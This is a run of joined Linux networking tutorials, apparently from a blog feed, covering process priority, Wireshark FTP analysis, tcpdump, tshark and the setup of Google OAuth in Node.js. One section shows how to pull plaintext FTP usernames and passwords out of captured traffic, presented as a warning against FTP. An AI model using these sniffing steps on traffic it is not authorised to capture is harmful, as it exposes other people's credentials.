ubuntu@ubuntu:~$ killall -9 firefox

or

ubuntu@ubuntu:~$ killall -SIGKILL firefox

Changing the process priority with nice and renice

Every process on your Linux system has a nice value, ranging from -20 to 19. It decides which processes get more CPU access in the system. The lower the nice value, the more access a process has to the CPU; for example, a process with a nice value of -16 has more access to the CPU than one with a nice value of 18. Only a user with root privileges can assign a negative nice value. A normal user can only assign nice values between 0 and 19, can only raise the nice value, and can only do so for its own processes. A root user can set any nice value for any process.

If you want to adjust how much CPU access a process gets, launch it with a specific nice value by typing the following command.

ubuntu@ubuntu:~$ nice -n 3 chrome

And renice the process

ubuntu@ubuntu:~$ renice -n -6 3612

Conclusion

This was a guide to managing processes on your Linux system with ps, top, lsof, pstree, pkill, kill, killall, nice, renice, etc. Some processes consume most of the CPU and RAM; knowing how to manage them increases your system's speed and performance and gives you a better environment to run the processes you want more efficiently.

Using Wireshark to Examine FTP Traffic https://linuxhint.com/examine-ftp-wireshark/

The previous article provided you with an in-depth understanding of Wireshark filters, the OSI layers, and ICMP and HTTP packet analysis. In this article, we will learn how FTP works and examine FTP Wireshark captures. Before we dig deep into the captured packet analysis, we will begin with a brief overview of the protocol.

FTP

FTP is a protocol used by computers to share information over the network. Simply put, it’s a way to share files between connected computers. As HTTP is built for Websites, FTP is optimized for large file transfers between computers.

The FTP client first builds a control connection request to the server port 21. A control connection requires a login to establish a connection. But some servers make all of their content available without any credentials. Such servers are known as anonymous FTP servers. Later a separate data connection is established to transfer files and folders.

FTP Traffic Analysis

The FTP client and server communicate without being aware that TCP manages every session. TCP is used in every session to control datagram delivery, arrival, and window size management. For each data exchange, a new TCP session is established between the FTP client and the FTP server. Hence, we will begin our analysis with the TCP packet information available for the FTP session initiation and termination in the middle pane.

Start packet capture from your selected interface and use the ftp command in the terminal to access the site ftp.mcafee.com.

ubuntu@ubuntu:~$ ftp ftp.mcafee.com

Log-in with your credentials, as shown in the screenshot below.

Use Ctrl+C to stop the capture and look for the FTP session initiation, followed by the TCP [SYN], [SYN, ACK], and [ACK] packets illustrating the three-way handshake of a reliable session. Apply the tcp filter to see the first three packets in the Packet list panel.

Wireshark displays detailed TCP information that matches the TCP packet segment. We highlight the TCP packet sent from the host computer to the McAfee FTP server to study the Transmission Control Protocol layer in the Packet detail panel. You can notice that the first TCP datagram for the FTP session initiation has only the SYN bit set to 1.

The explanation of each field in the Transmission Control Protocol layer in Wireshark is given below:

  • Source Port: 43854; the port used by the TCP host that initiated the connection. It's a number that lies above 1023.
  • Destination Port: 21; the port number associated with the FTP service. FTP servers listen on port 21 for client connection requests.
  • Sequence Number: a 32-bit field that holds the number of the first byte sent in a particular segment. This number helps in identifying messages received in order.
  • Acknowledgment Number: a 32-bit field that specifies the acknowledgment the receiver expects after successful transmission of the previous bytes.
  • Control Flags: each flag bit has a special meaning in TCP session management and contributes to how each packet segment is treated.

ACK: validates acknowledgment number of a receipt segment.

SYN: synchronize sequence number, which is set at the initiation of a new TCP session

FIN: request for session termination

URG: requests by the sender to send urgent data

RST: request for resetting the session

PSH: request for push

  • Window size: the sliding window value, which advertises the number of bytes the sender of this segment is willing to receive.
  • Checksum: field that holds checksum for error control. This field is mandatory in TCP in contrast to UDP.
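
If you want to isolate just these handshake packets in the Packet list panel, you can type display filters into the Wireshark filter bar. The expressions below use standard Wireshark field names; the last one assumes the default FTP control port:

tcp.flags.syn == 1 and tcp.flags.ack == 0
tcp.flags.syn == 1 and tcp.flags.ack == 1
tcp.port == 21

The first expression matches the client's initial SYN, the second matches the server's SYN-ACK, and the third shows all FTP control-channel traffic.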

Moving on to the second TCP datagram captured in the Wireshark filter: the McAfee server acknowledges the SYN request. You can notice that the SYN and ACK bits are both set to 1.

In the last packet, you can notice that the host sends an acknowledgment to the server for FTP session initiation. You can notice that the Sequence number and the ACK bits are set to 1.

After establishing the TCP session, the FTP client and server exchange some traffic: the FTP client acknowledges the FTP server's Response 220 packet sent via the TCP session. Hence, all of the information exchange between the FTP client and FTP server is carried out over TCP sessions.

After the FTP session completion, the ftp client sends the termination message to the server. After request acknowledgment, the TCP session at the server sends a termination announcement to the client’s TCP session. In response, the TCP session at the client acknowledges the termination datagram and sends its own termination session. After receipt of the termination session, the FTP server sends an acknowledgment of the termination, and the session is closed.

Warning

FTP does not use encryption, and the login and password credentials are visible in broad daylight. Hence, as long as no one is eavesdropping and you are transferring sensitive files within your network, it’s safe. But do not use this protocol to access content from the internet. Use SFTP that uses secure shell SSH for file transfer.

FTP Password Capture

We will now show why it’s important not to use FTP over the internet. We will look for the specific phrases in the captured traffic containing user, username, password, etc., as instructed below.

Go to Edit-> “Find Packet” and choose String for the Display Filter, and then select Packet bytes to show searched data in cleartext.

Type in the string pass in the filter, and click Find. You will find the packet with the string “Please specify the password” in the Packet bytes panel. You can also notice the highlighted packet in the Packet list panel.

Open this packet in a separate Wireshark window by right-clicking on the packet and select Follow->TCP stream.

Now search again, and you will find the password in plain text in the Packet byte panel. Open the highlighted packet in a separate window as above. You will find the user credentials in plaintext.
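
Alternatively, instead of searching the packet bytes manually, you can type a display filter into the Wireshark filter bar to isolate the FTP login commands directly. ftp.request.command is a standard Wireshark FTP field, so a filter along these lines should show only the USER and PASS packets:

ftp.request.command == "USER" or ftp.request.command == "PASS"

The credentials then appear in plain text in the Info column of the matching packets.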

Conclusion

In this article, we have learned how FTP works, analyzed how TCP controls and manages operations in an FTP session, and understood why it's important to use secure shell protocols for file transfer over the internet. In future articles, we will cover some of the command-line interfaces for Wireshark.

 

A Guide to Network Traffic Analysis Utility: TCPDUMP https://linuxhint.com/tcpdump-beginner-guide/

Tcpdump is a network packet sniffing command-line utility. It is most commonly used for troubleshooting networks and testing security issues. Despite the absence of a graphical user interface, it’s the most popular, powerful, and versatile command-line utility.

It is native to Linux, and most Linux distributions install it as part of the standard OS. Tcpdump is built on libpcap, a library for network datagram capture.

This article will demystify tcpdump by showing how to capture, read, and analyze captured network traffic in this utility. We will later use our understanding to inspect data packets with the advanced TCP flag filters.

Tcpdump Installation

Tcpdump default installation in your distro depends on the options selected during the installation process. In the case of custom installation, it’s possible that the package is not available. You can check tcpdump installation by using the dpkg command with the “-s” option.

ubuntu@ubuntu:~$ dpkg -s tcpdump

Or use the command “sudo apt-get install tcpdump” to install tcpdump in the Ubuntu Linux.

Capturing Packets in Tcpdump:

To begin the capture process, we first need to find our working interface using the “ifconfig” command. Or we can list all the available interfaces using the tcpdump command with the “-D” option.

ubuntu@ubuntu:~$ tcpdump -D

To begin the capture process, you can use the syntax;

tcpdump [-options] [expression]

For instance, in the command below, we use the “-i” option to capture traffic on the “enp0s3” interface, with a “-c” flag to limit the captured packets and write “-w” it to a test_capture.pcap file.

ubuntu@ubuntu:~$ sudo tcpdump -i enp0s3 -c 20 -w /tmp/test_capture.pcap

Similarly, you can use various filter combinations to isolate traffic as per your requirements. One such example is capturing network data leaving and arriving at a host, using the host primitive together with a specific port. Moreover, I have used the “-n” flag to prevent tcpdump from performing DNS lookups. This flag is very helpful for avoiding extra DNS traffic and delays while troubleshooting the network.

ubuntu@ubuntu:~$ sudo tcpdump -i enp0s3 -c 20 -n -w /tmp/test_capture1.pcap host 10.0.2.15 and dst port 80

tcpdump: listening on enp0s3, link-type EN10MB (Ethernet), capture size 262144 bytes

20 packets captured

21 packets received by filter

0 packets dropped by kernel

We use the “and” operator to capture only packets containing host 10.0.2.15 and destination port 80. Similarly, various other filters can be applied to ease troubleshooting tasks.
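
A few more hedged examples of filter combinations you might find handy; the interface name and addresses are placeholders for your own values:

ubuntu@ubuntu:~$ sudo tcpdump -i enp0s3 -n icmp -c 5
ubuntu@ubuntu:~$ sudo tcpdump -i enp0s3 -n 'udp and port 53' -c 10
ubuntu@ubuntu:~$ sudo tcpdump -i enp0s3 -n 'tcp and (port 80 or port 443) and not host 10.0.2.15' -c 10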

If you do not want to use the “-c” flag to limit the captured traffic, you can use an interrupt signal, i.e., Ctrl+C, to stop the capture process.

Reading Tcpdump Files

Reading tcpdump capture files can be a lot overwhelming. By default, tcpdump resolves IP addresses and ports to names. We will use the “-r” flag to read our already captured file test_capture.pcap saved in the /tmp folder. We will pipe the output to the awk command to print only the source address and port, and pipe that to the head command to display only the first 5 entries.

ubuntu@ubuntu:~$ sudo tcpdump -r /tmp/test_capture.pcap | awk -F " " '{print $3}' | head -5

reading from file /tmp/test_capture.pcap, link-type EN10MB (Ethernet)

IP ubuntu.53298

IP ubuntu.53298

IP ubuntu.53298

IP ubuntu.53298

IP ubuntu.53298

However, it is recommended to use IP addresses and ports in numbers to resolve networking issues. We will disable IP name resolution with the “-n” flag and port names with “-nn“.

ubuntu@ubuntu:~$ sudo tcpdump -i enp0s3 -n

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on enp0s3, link-type EN10MB (Ethernet), capture size 262144 bytes

20:08:22.146354 IP 10.0.2.15.54080 > 172.67.39.148.443: Flags [P.], seq 1276027591:1276027630, ack 544039114, win 63900, length 39

20:08:22.146745 IP 10.0.2.15.43456 > 54.204.39.132.443: Flags [P.], seq 3381018839:3381018885, ack 543136109, win 65535, length 46

20:08:22.147506 IP 172.67.39.148.443 > 10.0.2.15.54080: Flags [.], ack 39, win 65535, length 0

20:08:22.147510 IP 54.204.39.132.443 > 10.0.2.15.43456: Flags [.], ack 46, win 65535, length 0

20:08:22.202346 IP 216.58.209.142.443 > 10.0.2.15.41050: Flags [P.], seq 502925703:502925826, ack 1203118935, win 65535, length 123

20:08:22.202868 IP 10.0.2.15.41050 > 216.58.209.142.443: Flags [P.], seq 1:40, ack 123, win 65535, length 39

Understanding Captured Output

Tcpdump captures many protocols, including UDP, TCP, ICMP, etc. It isn’t easy to cover all of them here. However, it’s important to understand how the information is displayed and what parameters it includes.

Tcpdump displays each packet in a line, with a timestamp and information with respect to the protocol. Generally, the format of a TCP protocol is as follows:

<timestamp> <protocol> <src ip>.<src port> > <dst ip>.<dst port>: <flags>, <seq>, <ack>, <win size>, <options>, <data length>

Let's explain one of the captured packets field by field:

20:08:22.146354 IP 10.0.2.15.54080 > 172.67.39.148.443: Flags [P.], seq 1276027591:1276027630, ack 544039114, win 63900, length 39
  • 20:08:22.146354: Timestamp of the captured packet
  • IP: Network layer protocol.
  • 10.0.2.15.54080: This field contains the source IP address and source port.
  • 172.67.39.148.443: This field represents the destination IP address and port number.
  • Flags[P.]/<flags>: The flags represent the connection state. In this case, [P.] indicates the PUSH acknowledgment packet. The flag field also includes some other values like:
    1. S: SYN
    2. P: PUSH
    3. [.]: ACK
    4. F: FIN
    5. [S.]: SYN_ACK
    6. R: RST
  • seq 1276027591:1276027630: The sequence numbers, in first:last format, denote the range of data bytes carried in the packet. Excluding the first packet, where the numbers are absolute, subsequent packets show relative numbers. In this case, the numbers mean that the packet contains data bytes from 1276027591 to 1276027630.
  • ack 544039114: The acknowledgment number depicts the next expected data sequence number.
  • win 63900: The window size depicts the number of available bytes in the received buffer.
  • length 39: Length of payload data, in bytes.

Advanced Filters

Now we can use some advanced header filter options to display and analyze only data packets. In any TCP packet, the TCP flags are located in the 14th byte, with PSH and ACK represented by the 4th and 5th bits.

We can use this information by turning on these bits 00011000 or 24 to display data packets with only PSH and ACK flags. We pass this number to tcpdump with the filter “tcp[13]=24“, note that the array index in TCP begins at zero.

We will filter out this packet from our text_capture.pcap file and use the -A option to display all the packet details for you.

Similarly, you can filter out some other flag packets using “tcp[13]=8” and “tcp[13]=2” for only PSH and SYN flags, etc.

ubuntu@ubuntu:~$ sudo tcpdump -A 'tcp[13]=24' -r /tmp/test_capture.pcap

reading from file /tmp/test_capture.pcap, link-type EN10MB (Ethernet)

19:26:17.827902 IP ubuntu.53298 > 32.121.122.34.bc.googleusercontent.com.http: Flags [P.], seq 4286571276:4286571363, ack 252096002, win 64240, length 87: HTTP: GET / HTTP/1.1

E...:?@.@.X.

..."zy .2.P........P.......GET / HTTP/1.1

Host: connectivity-check.ubuntu.com

Accept: */*

Connection: close

Conclusion

In this article, we have introduced you to some of the most important topics of tcpdump. Tcpdump, combined with the power of CLI, can be of great help in network troubleshooting, automation, and security management. Once studied and combined, its filters and command line options can contribute a lot to your day-to-day troubleshooting and automation tasks and overall understanding of the network.

A Guide to the Wireshark Command Line Interface “tshark” https://linuxhint.com/wireshark-command-line-interface-tshark/

In the earlier tutorials for Wireshark, we have covered fundamental to advanced level topics. In this article, we will understand and cover a command-line interface for Wireshark, i.e., tshark. The terminal version of Wireshark supports similar options and is very useful when a Graphical User Interface (GUI) isn't available.

Even though a graphical user interface is, theoretically, a lot easier to use, not all environments support it, especially server environments with only command-line options. Hence, at some point in time, as a network administrator or a security engineer, you will have to use a command-line interface. Important to note that tshark is sometimes used as a substitute for tcpdump. Even though both tools are almost equivalent in traffic capturing functionality, tshark is a lot more powerful.

The best you can do is to use tshark to set up a port in your server that forwards information to your system, so you can capture traffic for analysis using a GUI. However, for the time being, we will learn how it works, what are its attributes, and how you can utilize it to the best of its capabilities.

Type the following command to install tshark in Ubuntu/Debian using apt-get:

ubuntu@ubuntu:~$ sudo apt-get install tshark -y

Now type tshark --help to list all the possible arguments with their respective flags that we can pass to the tshark command.

ubuntu@ubuntu:~$ tshark --help | head -20

TShark (Wireshark) 2.6.10 (Git v2.6.10 packaged as 2.6.10-1~ubuntu18.04.0)

Dump and analyze network traffic.

See https://www.wireshark.org for more information.

Usage: tshark [options] ...

Capture interface:

-i <interface> name or idx of interface (def: first non-loopback)

-f <capture filter> packet filter in libpcap filter syntax

-s <snaplen> packet snapshot length (def: appropriate maximum)

-p don't capture in promiscuous mode

-I capture in monitor mode, if available

-B <buffer size> size of kernel buffer (def: 2MB)

-y <link type> link layer type (def: first appropriate)

--time-stamp-type <type> timestamp method for interface

-D print list of interfaces and exit

-L print list of link-layer types of iface and exit

--list-time-stamp-types print list of timestamp types for iface and exit

Capture stop conditions:

You can notice a list of all available options. In this article, we will cover most of the arguments in detail, and you will understand the power of this terminal oriented Wireshark version.

Selecting Network Interface:

To conduct live capture and analysis in this utility, we first need to figure out our working interface. Type tshark -D and tshark will list all the available interfaces.

ubuntu@ubuntu:~$ tshark -D

1. enp0s3

2. any

3. lo (Loopback)

4. nflog

5. nfqueue

6. usbmon1

7. ciscodump (Cisco remote capture)

8. randpkt (Random packet generator)

9. sshdump (SSH remote capture)

10. udpdump (UDP Listener remote capture)

Note that not all the listed interfaces will be working. Type ifconfig to find working interfaces on your system. In my case, it’s enp0s3.

Capture Traffic:

To start the live capture process, we will use the tshark command with the “-i” option to begin the capture process from the working interface.

ubuntu@ubuntu:~$ tshark -i enp0s3

Use Ctrl+C to stop the live capture. You can pipe the captured traffic to the Linux head command to display only the first few captured packets, or you can use the “-c <n>” option to capture just “n” packets.

ubuntu@ubuntu:~$ tshark -i enp0s3 -c 5

If you only enter tshark, by default, it will not start capturing traffic on all available interfaces nor will it listen to your working interface. Instead, it will capture packets on the first listed interface.

You can also use the following command to check on multiple interfaces:

ubuntu@ubuntu:~$ tshark -i enp0s3 -i usbmon1 -i lo

In the meantime, another way to live capture traffic is to use the number alongside the listed interfaces.

ubuntu@ubuntu:~$ tshark -i interface_number

However, in the presence of multiple interfaces, it’s hard to keep track of their listed numbers.

Capture Filter:

Capture filters significantly reduce the captured file size. Tshark uses the Berkeley Packet Filter syntax “-f <filter>”, which is also used by tcpdump. We will use the “-f” option to capture only packets from ports 80 or 53 and use “-c” to display only the first 10 packets.

ubuntu@ubuntu:~$ tshark -i enp0s3 -f "port 80 or port 53" -c 10

Saving Captured Traffic to a File:

The key thing to note in the above screenshot is that the information displayed isn’t saved, hence it’s less useful. We use the argument “-w” to save the captured network traffic to test_capture.pcap in /tmp folder.

ubuntu@ubuntu:~$ tshark -i enp0s3 -w /tmp/test_capture.pcap

Whereas, .pcap is the Wireshark file type extension. By saving the file, you can review and analyze the traffic in a machine with Wireshark GUI later.

It’s a good practice to save the file in /tmp as this folder doesn’t require any execution privileges. If you save it to another folder, even if you are running tshark with root privileges, the program will deny permission due to security reasons.

Let’s dig into all the possible ways through which you can:

  • apply limits to the captured data, such as exiting tshark or auto-stopping the capture process, and
  • output your capture files.

Autostop Parameter:

You can use the “-a” parameter with the available flags duration, filesize, and files. In the following command, we use the autostop parameter with the duration flag to stop the process after 120 seconds.

ubuntu@ubuntu:~$ tshark -i enp0s3 -a duration:120 -w /tmp/test_capture.pcap

Similarly, if you don’t need your files to be extra-large, the filesize flag is perfect for stopping the process once the file reaches a limit of some KBs.

ubuntu@ubuntu:~$ tshark -i enp0s3 -a filesize:50 -w /tmp/test_capture.pcap

The files flag allows you to stop the capture process after a given number of files have been written. This only makes sense when multiple files are being created, which requires another useful parameter: the capture output option.

Capture Output Parameter:

The capture output, or ring buffer, argument “-b” accepts the same flags as autostop. However, the behavior is different: with the duration and filesize flags, tshark switches to a new output file after reaching the specified time limit in seconds or file size, instead of stopping the capture.

The command below captures traffic on our network interface enp0s3 and uses the capture filter “-f” to restrict it to DNS (port 53) and FTP (port 21) traffic. We use the ring buffer option “-b” with the filesize flag to save each file at 15 KB, and the autostop argument with the files flag so that the capture stops after the specified number of files has been generated.

ubuntu@ubuntu:~$ tshark -i enp0s3 -f "port 53 or port 21" -b filesize:15 -a files:2 -w /tmp/test_capture.pcap

I have split my terminal into two screens to actively monitor the creation of the .pcap files.

Go to your /tmp folder and use the following command in the second terminal to monitor updates after every one second.

ubuntu@ubuntu:~$ watch -n 1 "ls -lt"

Now, you do not need to memorize all these flags. Instead, type a command tshark -i enp0s3 -f “port 53 or port 21” -b filesize:15 -a in your terminal and press Tab. The list of all available flags will be available on your screen.

ubuntu@ubuntu:~$ tshark -i enp0s3 -f "port 53 or port 21" -b filesize:15 -a
duration: files: filesize:
ubuntu@ubuntu:~$ tshark -i enp0s3 -f "port 53 or port 21" -b filesize:15 -a

Reading .pcap Files:

You can use the “-r” parameter to read the test_capture.pcap file and pipe the output to the head command.

ubuntu@ubuntu:~$ tshark -r /tmp/test_capture.pcap | head

The information displayed in the output file can be a bit overwhelming. To avoid unnecessary details and get a better understanding of a specific destination IP address, we use the “-r” option to read the captured packet file, apply an ip.dst filter, and redirect the matching packets to a new file with the “-w” option. This allows us to review the file later and refine our analysis by applying further filters.

ubuntu@ubuntu:~$ tshark -r /tmp/test_capture.pcap -w /tmp/redirected_file.pcap ip.dst==216.58.209.142
ubuntu@ubuntu:~$ tshark -r /tmp/redirected_file.pcap|head
1 0.000000000 10.0.2.15 → 216.58.209.142 TLSv1.2 370 Application Data
2 0.000168147 10.0.2.15 → 216.58.209.142 TLSv1.2 669 Application Data
3 0.011336222 10.0.2.15 → 216.58.209.142 TLSv1.2 5786 Application Data
4 0.016413181 10.0.2.15 → 216.58.209.142 TLSv1.2 1093 Application Data
5 0.016571741 10.0.2.15 → 216.58.209.142 TLSv1.2 403 Application Data
6 0.016658088 10.0.2.15 → 216.58.209.142 TCP 7354 [TCP segment of a reassembled PDU]
7 0.016738530 10.0.2.15 → 216.58.209.142 TLSv1.2 948 Application Data
8 0.023006863 10.0.2.15 → 216.58.209.142 TLSv1.2 233 Application Data
9 0.023152548 10.0.2.15 → 216.58.209.142 TLSv1.2 669 Application Data
10 0.023324835 10.0.2.15 → 216.58.209.142 TLSv1.2 3582 Application Data

Selecting Fields to Output:

The commands above output a summary of each packet that includes various header fields. Tshark also allows you to view only specified fields. To specify fields, we use the “-T fields” option and extract the fields of our choice.

After the “-T fields” switch, we use the “-e” option to name each field to print. Here, we can use Wireshark display filter field names.

ubuntu@ubuntu:~$ tshark -r /tmp/test_capture.pcap -T fields -e frame.number -e ip.src -e ip.dst | head

1 10.0.2.15 216.58.209.142
2 10.0.2.15 216.58.209.142
3 216.58.209.142 10.0.2.15
4 216.58.209.142 10.0.2.15
5 10.0.2.15 216.58.209.142
6 216.58.209.142 10.0.2.15
7 216.58.209.142 10.0.2.15
8 216.58.209.142 10.0.2.15
9 216.58.209.142 10.0.2.15
10 10.0.2.15 115.186.188.3

Capture Encrypted Handshake Data:

So far, we have learned to save and read output files using various parameters and filters. We will now learn how an HTTPS session is initialized, using tshark. Websites accessed via HTTPS instead of HTTP ensure secure, encrypted data transmission over the wire. For secure transmission, Transport Layer Security encryption starts with a handshake process to kick off communication between the client and the server.

Let’s capture and understand the TLS handshake using tshark. Split your terminal into two screens and use a wget command to retrieve an html file from https://www.wireshark.org.

ubuntu@ubuntu:~$ wget https://www.wireshark.org
--2021-01-09 18:45:14-- https://www.wireshark.org/
Connecting to www.wireshark.org (www.wireshark.org)|104.26.10.240|:443... connected.
HTTP request sent, awaiting response... 206 Partial Content
Length: 46892 (46K), 33272 (32K) remaining [text/html]
Saving to: ‘index.html’
index.html 100%[++++++++++++++==================================>] 45.79K 154KB/s in 0.2s
2021-01-09 18:43:27 (154 KB/s) - ‘index.html’ saved [46892/46892]

In another screen, we will use tshark to capture the first 11 packets by using the “-c” parameter. While performing analysis, timestamps are important to reconstruct events, so we use “-t ad” so that tshark adds an absolute date and time alongside each captured packet. Lastly, we use the host capture filter to capture only packets exchanged with the given host IP address.

This handshake is quite similar to the TCP handshake. As soon as the TCP three-way handshake concludes in the first three packets, the fourth to ninth packets follow a somewhat similar handshake ritual and include TLS strings to ensure encrypted communication between both parties.

ubuntu@ubuntu:~$ tshark -i enp0s3 -c 11 -t ad host 104.26.10.240
Capturing on 'enp0s3'
1 2021-01-09 18:45:14.174524575 10.0.2.15 → 104.26.10.240 TCP 74 48512 → 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1 TSval=2488996311 TSecr=0 WS=128
2 2021-01-09 18:45:14.279972105 104.26.10.240 → 10.0.2.15 TCP 60 443 → 48512 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460
3 2021-01-09 18:45:14.280020681 10.0.2.15 → 104.26.10.240 TCP 54 48512 → 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0
4 2021-01-09 18:45:14.280593287 10.0.2.15 → 104.26.10.240 TLSv1 373 Client Hello
5 2021-01-09 18:45:14.281007512 104.26.10.240 → 10.0.2.15 TCP 60 443 → 48512 [ACK] Seq=1 Ack=320 Win=65535 Len=0
6 2021-01-09 18:45:14.390272461 104.26.10.240 → 10.0.2.15 TLSv1.3 1466 Server Hello, Change Cipher Spec
7 2021-01-09 18:45:14.390303914 10.0.2.15 → 104.26.10.240 TCP 54 48512 → 443 [ACK] Seq=320 Ack=1413 Win=63540 Len=0
8 2021-01-09 18:45:14.392680614 104.26.10.240 → 10.0.2.15 TLSv1.3 1160 Application Data
9 2021-01-09 18:45:14.392703439 10.0.2.15 → 104.26.10.240 TCP 54 48512 → 443 [ACK] Seq=320 Ack=2519 Win=63540 Len=0
10 2021-01-09 18:45:14.394218934 10.0.2.15 → 104.26.10.240 TLSv1.3 134 Change Cipher Spec, Application Data
11 2021-01-09 18:45:14.394614735 104.26.10.240 → 10.0.2.15 TCP 60 443 → 48512 [ACK] Seq=2519 Ack=400 Win=65535 Len=0
11 packets captured

Viewing Entire Packet:

The only disadvantage of a command-line utility is the lack of a GUI; a GUI becomes very handy when you need to search through a lot of internet traffic, since it offers a Packet Panel that displays all the packet details in an instant. However, it is still possible to inspect a packet from the terminal and dump the same packet information that the GUI Packet Panel would display.

To inspect an entire packet, we first generate a single packet with the ping command, using its “-c” option to send one echo request.

ubuntu@ubuntu:~$ ping -c 1 104.26.10.240
PING 104.26.10.240 (104.26.10.240) 56(84) bytes of data.
64 bytes from 104.26.10.240: icmp_seq=1 ttl=55 time=105 ms
--- 104.26.10.240 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 105.095/105.095/105.095/0.000 ms

In another window, use the tshark command with the “-V” flag to display the entire packet details. You will notice various sections displaying the Frame, Ethernet II, IPv4, and ICMP details.

ubuntu@ubuntu:~$ tshark -i enp0s3 -c 1 -V host 104.26.10.240
Frame 1: 98 bytes on wire (784 bits), 98 bytes captured (784 bits) on interface 0
Interface id: 0 (enp0s3)
Interface name: enp0s3
Encapsulation type: Ethernet (1)
Arrival Time: Jan 9, 2021 21:23:39.167581606 PKT
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1610209419.167581606 seconds
[Time delta from previous captured frame: 0.000000000 seconds]
[Time delta from previous displayed frame: 0.000000000 seconds]
[Time since reference or first frame: 0.000000000 seconds]
Frame Number: 1
Frame Length: 98 bytes (784 bits)
Capture Length: 98 bytes (784 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:icmp:data]
Ethernet II, Src: PcsCompu_17:fc:a6 (08:00:27:17:fc:a6), Dst: RealtekU_12:35:02 (52:54:00:12:35:02)
Destination: RealtekU_12:35:02 (52:54:00:12:35:02)
Address: RealtekU_12:35:02 (52:54:00:12:35:02)
.... ..1. .... .... .... .... = LG bit: Locally administered address (this is NOT the factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: PcsCompu_17:fc:a6 (08:00:27:17:fc:a6)
Address: PcsCompu_17:fc:a6 (08:00:27:17:fc:a6)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 10.0.2.15, Dst: 104.26.10.240
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
0000 00.. = Differentiated Services Codepoint: Default (0)
.... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
Total Length: 84
Identification: 0xcc96 (52374)
Flags: 0x4000, Don't fragment
0... .... .... .... = Reserved bit: Not set
.1.. .... .... .... = Don't fragment: Set
..0. .... .... .... = More fragments: Not set
...0 0000 0000 0000 = Fragment offset: 0
Time to live: 64

Protocol: ICMP (1)
Header checksum: 0xeef9 [validation disabled]
[Header checksum status: Unverified]
Source: 10.0.2.15
Destination: 104.26.10.240
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0x0cb7 [correct]
[Checksum Status: Good]
Identifier (BE): 5038 (0x13ae)
Identifier (LE): 44563 (0xae13)
Sequence number (BE): 1 (0x0001)
Sequence number (LE): 256 (0x0100)
Timestamp from icmp data: Jan 9, 2021 21:23:39.000000000 PKT
[Timestamp from icmp data (relative): 0.167581606 seconds]
Data (48 bytes)
0000 91 8e 02 00 00 00 00 00 10 11 12 13 14 15 16 17 ................
0010 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 ........ !"#$%&'
0020 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 ()*+,-./01234567
Data: 918e020000000000101112131415161718191a1b1c1d1e1f...
[Length: 48]

Conclusion:

The most challenging aspect of packet analysis is finding the most relevant information and ignoring the useless bits. Even though graphical interfaces are easy, they cannot contribute to automated network packet analysis. In this article, you have learned the most useful tshark parameters for capturing, displaying, saving, and reading network traffic files.

Tshark is a very handy utility that reads and writes the capture files supported by Wireshark. The combination of display and capture filters helps a lot when working on advanced use cases. We can leverage tshark's ability to print fields and manipulate data as per our requirements for in-depth analysis. In other words, it's capable of doing virtually everything that Wireshark does. Most importantly, it's perfect for sniffing packets remotely over SSH, which is a topic for another day.

]]>
How to Authorize Users Using Google OAuth in Node.js https://linuxhint.com/authorize-users-using-google-oauth/ Tue, 02 Feb 2021 19:17:38 +0000 https://linuxhint.com/?p=88770

Open Authorization, also known as OAuth, is a protocol used to authorize a user on your website using a third-party service like Google, Github, Facebook, etc. The third-party service shares some data (name, email, profile picture, etc.) with your website and authorizes the user on its behalf, so your website does not have to manage usernames and passwords, saving users a lot of extra trouble.

How OAuth Works

When a user clicks on “Login with Google”, it takes the user to the Google OAuth consent page. When the user agrees to the consent and authenticates his identity on Google, Google will contact your website as a third party service and authorize the user on its behalf and share some data with your website. In this way, the user can be authorized without managing the credentials for your website separately.

Implementing Google OAuth using Node.js

Almost all programming languages provide libraries to implement Google OAuth to authorize users. Node.js provides the ‘passport’ and ‘passport-google-oauth20’ libraries to implement Google OAuth. In this article, we will implement the OAuth protocol to authorize users using Node.js.

Create a Project on Google

The first step to implement Google OAuth is to create a project on the Google developer console for your website. This project is used to get the API keys used to make requests to Google for open authentication. Go to the following link and create your project.

https://console.developers.google.com

Configuring Google Project

After you create the project, go into the project and select “OAuth consent screen” from the left side menu.

Click on the ‘create’ button and provide all the details of your project. Click “Save and Continue” to move on.

Now provide the scope of your project. Scopes are the types of permissions to access the user’s data from a google account. You need to set up the permissions to get specific user data from your google account. Click “Save and Continue.”

Now add the test users to the project if you want. Test users are the only allowed users who can access your web application in Testing mode. For now, we will not enter any test user and click “Save and Continue” to move on to the summary page of the project.

Review your project on the summary page and save the configuration. Now we will generate credentials for our project. Select the ‘Credentials’ tab on the left side menu and click on the ‘Create credentials’ button on top to generate OAuth 2.0 Client IDs.

From the dropdown menu, select ‘OAuth client ID’ and specify the type of application as ‘Web application’ and your application’s name.

On the same page, we have to provide two URIs, the ‘Authorized Javascript Origins’ and the ‘Authorized redirect URIs’. The ‘Authorized javascript origins’ is the HTTP origin of your web application, and it can not have any path. The ‘Authorized redirect URIs’ is the exact URI with a path where the user will be redirected after google authentication.
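For example, for the local setup used later in this article (the server runs on port 8000 and redirects to the /authorized route), the values would look like the following. These are illustrative values based on that setup, not values mandated by Google:

Authorized JavaScript origins: http://localhost:8000

Authorized redirect URIs: http://localhost:8000/authorized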

After entering all the required entries, click on ‘create’ to create OAuth credentials.

Initiating Node.js Project

So far, we have created a google project to authorize users for our application using google. Now we are going to initiate the node.js project to implement oauth. Create a directory named ‘auth’ and initiate the express project.

ubuntu@ubuntu:~$ mkdir auth

ubuntu@ubuntu:~$ cd auth

ubuntu@ubuntu:~$ npm init -y
